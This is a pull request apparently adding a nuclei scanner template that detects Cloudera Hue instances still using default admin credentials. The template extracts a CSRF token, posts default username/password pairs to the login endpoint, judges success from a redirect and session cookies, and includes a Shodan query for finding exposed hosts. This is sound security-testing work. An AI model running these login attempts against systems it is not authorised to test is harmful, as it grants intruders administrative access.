### PR TITLE
add hue-default-credential.yaml

### DIFF
--- a/default-logins/cobbler/hue-default-credential.yaml
+++ b/default-logins/cobbler/hue-default-credential.yaml
@@ -5,9 +5,10 @@ info:
   author: For3stCo1d
   severity: high
   description: Hue default admin login was discovered.
+  reference: https://github.com/cloudera/hue
   metadata:
     shodan-query: title:"Hue - Welcome to Hue"
-  tags: hue,default-login
+  tags: hue,default-login,oss
 
 requests:
   - raw:

--- a/default-logins/cobbler/hue-default-credential.yaml
+++ b/default-logins/cobbler/hue-default-credential.yaml
@@ -21,6 +21,7 @@ requests:
         Content-Type: application/x-www-form-urlencoded
 
         csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F
+
     attack: pitchfork
     payloads:
       user:
@@ -28,6 +29,7 @@ requests:
         - hue
         - hadoop
         - cloudera
+
       pass:
         - admin
         - hue
@@ -44,12 +46,15 @@ requests:
         regex:
           - name='csrfmiddlewaretoken' value='(.+?)'
 
+    req-condition: true
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - contains(tolower(all_headers), 'csrftoken')
-          - contains(tolower(all_headers), 'sessionid')
+          - contains(tolower(body_1), 'welcome to hue')
+          - contains(tolower(all_headers_2), 'csrftoken=')
+          - contains(tolower(all_headers_2), 'sessionid=')
         condition: and
 
       - type: status

--- a/default-logins/cobbler/hue-default-credential.yaml
+++ b/default-logins/cobbler/hue-default-credential.yaml
@@ -1,0 +1,57 @@
+id: hue-default-credential
+
+info:
+  name: Cloudera Hue Default Admin Login
+  author: For3stCo1d
+  severity: high
+  description: Hue default admin login was discovered.
+  metadata:
+    shodan-query: title:"Hue - Welcome to Hue"
+  tags: hue,default-login
+
+requests:
+  - raw:
+      - |
+        GET /hue/accounts/login?next=/ HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /hue/accounts/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F
+    attack: pitchfork
+    payloads:
+      user:
+        - admin
+        - hue
+        - hadoop
+        - cloudera
+      pass:
+        - admin
+        - hue
+        - hadoop
+        - cloudera
+
+    cookie-reuse: true
+    extractors:
+      - type: regex
+        name: csrfmiddlewaretoken
+        part: body
+        internal: true
+        group: 1
+        regex:
+          - name='csrfmiddlewaretoken' value='(.+?)' 
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(tolower(all_headers), 'csrftoken')
+          - contains(tolower(all_headers), 'sessionid')
+        condition: and
+
+      - type: status
+        status:
+          - 302

--- a/default-logins/cobbler/hue-default-credential.yaml
+++ b/default-logins/cobbler/hue-default-credential.yaml
@@ -42,7 +42,7 @@ requests:
         internal: true
         group: 1
         regex:
-          - name='csrfmiddlewaretoken' value='(.+?)' 
+          - name='csrfmiddlewaretoken' value='(.+?)'
 
     matchers-condition: and
     matchers:


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:https://github.com/cloudera/hue

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)